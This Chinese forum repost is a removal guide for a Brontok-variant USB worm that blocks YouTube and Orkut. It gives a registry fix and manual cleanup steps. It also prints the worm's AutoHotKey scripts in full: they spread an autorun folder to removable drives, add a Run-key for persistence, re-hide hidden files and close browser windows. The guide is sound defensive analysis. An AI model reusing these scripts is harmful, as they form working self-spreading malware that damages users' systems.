|
寂寞的枯叶 天真小顽童
- UID
- 43374
- 帖子
- 1238
- 精华
- 20
- 积分
- 3651
- 阅读权限
- 40
- 性别
- 男
- 来自
- 被砍伐的树
- 在线时间
- 534 小时
- 注册时间
- 10-1-2008
- 最后登录
- 3-1-2009
|
1#
大 中
小 发表于 1-8-2008 13:37 只看该作者
[转帖]Brontok变种 (让你无法进入YOUTUBE) 完全解决手册
Brontok变种 (让你无法进入YOUTUBE) 完全解决手册 刚刚中了一个病毒,因为多手的关系,现在好了,可以自行研究一下。
病毒本身像多年前的brontok一样,本身是一个黄色的folder,名为MicrosoftPowerPoint,其实是一个.exe file,只是用了system folder的icon来掩饰。它随身带着一个autorun.inf。
我点击这个exe后,它就会在每一个你的folder里面建立一个同样名称的exe,而且还在c drive留下一个名为heap41a的隐性folder(里面就是病毒的基地)。因为中了这病毒后,你的folder option会被改为do not show hidden file,所以你必须先救回你的folder option。
方法一:
打开notepad,copy and paste以下的文字,
REGEDIT4
;Fix Folder Options and Show Folder Check
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"Checkedvalue"=dword:0000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:0000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:0000000
然后save as
save as types: all files
save as names: FCheck.reg
完成后,双击(double click)
方法二:
利用“病毒防御者”,选修复工具>>修复系统工具>> 右边选“修复显示所有文件和文件夹”
好了,现在set你的系统show all hidden files。
看图解说:
1.在c drive里,看到heap41a的folder,进去,看到offspring的folder,里面就是病毒的基地(auorun.inf和MicrosoftPowerPoint的exe),这也就是为何你每次delete了pendrive里面的autorun.inf,可是过后它又跑出来的原因,因为你的系统已被命令copy一个autorun.inf去你的drive。
2.reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
上述的command会运行driveList(driveList里面是c,d,e...y,z),然后就会到FileCopydir,C:\heap41a\offspring,%element%:\,1 >> 就是在每个drive抄入offspring folder里的autorun.inf和MicrosoftPowerPoint.exe。过后再在HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon里面写入C:\heap41a\svchost.exe C:\heap41a\std.txt
先delete整个heap41a的folder。请打开task manager,在processes,选svchost.exe(后面为AutoHotKey),end process。接着在run,打入regedit,然后delete上述的注册码。
3.std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
这一个command就是为何你set了show hidden file,又跑回去do not show hidden file,我在上面的FCheck.reg已经会把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL>>Checkedvalue改回去1。
4.script1.txt
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r牋牋牋牋OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r 燤UHAHAHA!!,30
return
}
}
return
上面这一个file是为何你进不到youtube,或者你用firefox时会看到一些叫你用IE的怪信息。看到2.mp3吗?这个是一个音乐档,是一个奸笑的声音。
后记:
中病毒了请不要一直说要format,很多时候我们是可以简单设置把系统就回来的!
|
